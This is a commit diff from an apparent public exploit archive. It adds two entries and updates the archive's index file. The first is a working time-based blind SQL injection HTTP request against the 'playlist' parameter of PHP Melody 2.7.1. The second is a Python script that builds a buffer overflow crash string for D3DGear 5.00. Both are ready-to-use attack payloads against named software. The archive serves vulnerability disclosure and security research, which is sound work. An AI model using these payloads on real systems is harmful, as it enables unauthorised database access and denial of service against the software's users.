DB: 2018-01-01

2 changes to exploits/shellcodes D3DGear 5.00 Build 2175 - Buffer Overflow PHP Melody 2.7.1 - 'playlist' SQL Injection
2018-01-01 05:02:13 +00:00 · 2018-01-01 05:02:13 +00:00 · 07e51f4126
commit 07e51f4126
parent 26a51e4657
3 changed files with 49 additions and 0 deletions
--- a/exploits/php/webapps/43409.txt
+++ b/exploits/php/webapps/43409.txt
@ -0,0 +1,22 @@
+# Exploit Title: PHP Melody v2.7.1 - SQL Injection
+# Date: 30/12/2017
+# Exploit Author: Ahmad Mahfouz 
+# Contact: http://twitter.com/eln1x
+# Vendor Homepage: http://www.phpsugar.com/ Buy http://www.phpsugar.com/phpmelody_order.html
+# Version: 2.7.1
+# Tested on: Mac OS
+#
+# SQL Injection Type: time-based blind
+# Parameter: playlist
+# Page: ajax.php
+# URL: http://target.com/ajax.php?p=video&do=getplayer&vid=[VALID_VIDO_ID]&aid=1&player=detail&playlist=[SQLi]
+
+ 
+
+GET /ajax.php?p=video&do=getplayer&vid=randomid&aid=1&player=detail&playlist='+(select*from(select(sleep(20)))a)+' HTTP/1.1
+Host: localhost
+Accept: text/html, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
--- a/exploits/windows/dos/43410.py
+++ b/exploits/windows/dos/43410.py
@ -0,0 +1,25 @@
+#!/usr/bin/python
+ 
+#
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title: D3DGear 5.00 Build 2175 - Buffer Overflow
+# Date: 07-11-2017
+# Vulnerable Software: D3DGear 5.00 Build 2175
+# Vendor Homepage: http://www.d3dgear.com/
+# Version: 5.00 Build 2175
+# Software Link: http://www.d3dgear.com/products.htm
+# Tested On: Windows 7 x86
+#
+#
+# PoC: generate crash.txt, open program, select broadcast, paste crash.txt contents in stream key
+#
+# app crashes; 00420042 Pointer to next SEH record; no eip overwrite; one unicode ppr pointer
+#
+  
+file = "crash.txt"
+
+buffer = "A"* 1284 + "B"*4
+writeFile = open (file, "w")
+writeFile.write( buffer )
+writeFile.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -5436,6 +5436,7 @@ id,file,description,date,author,type,platform,port
 43401,exploits/hardware/dos/43401.py,"Telesquare SKT LTE Router SDT-CS3B1 - Denial of Service",2017-12-27,LiquidWorm,dos,hardware,
 43403,exploits/windows/dos/43403.py,"SysGauge Server 3.6.18 - Denial of Service",2017-12-27,"Ahmad Mahfouz",dos,windows,
 43406,exploits/windows/dos/43406.py,"ALLMediaServer 0.95 - Buffer Overflow (PoC)",2017-12-27,"Aloyce J. Makalanga",dos,windows,
+43410,exploits/windows/dos/43410.py,"D3DGear 5.00 Build 2175 - Buffer Overflow",2017-12-31,bzyo,dos,windows,
 41623,exploits/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",dos,windows,
 41629,exploits/windows/dos/41629.py,"FTPShell Client 6.53 - 'Session name' Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,dos,windows,
 41637,exploits/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,dos,windows,
@ -37679,6 +37680,7 @@ id,file,description,date,author,type,platform,port
 43400,exploits/hardware/webapps/43400.html,"Telesquare SKT LTE Router SDT-CS3B1 - Cross-Site Request Forgery",2017-12-27,LiquidWorm,webapps,hardware,
 43402,exploits/hardware/webapps/43402.txt,"Telesquare SKT LTE Router SDT-CS3B1 - Information Disclosure",2017-12-27,LiquidWorm,webapps,hardware,
 43405,exploits/aspx/webapps/43405.rb,"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)",2017-12-27,"Glafkos Charalambous",webapps,aspx,
+43409,exploits/php/webapps/43409.txt,"PHP Melody 2.7.1 - 'playlist' SQL Injection",2017-12-31,"Ahmad Mahfouz",webapps,php,
 41622,exploits/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",webapps,php,
 41625,exploits/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,webapps,hardware,
 41626,exploits/hardware/webapps/41626.txt,"AXIS (Multiple Products) - Cross-Site Request Forgery",2017-03-17,Orwelllabs,webapps,hardware,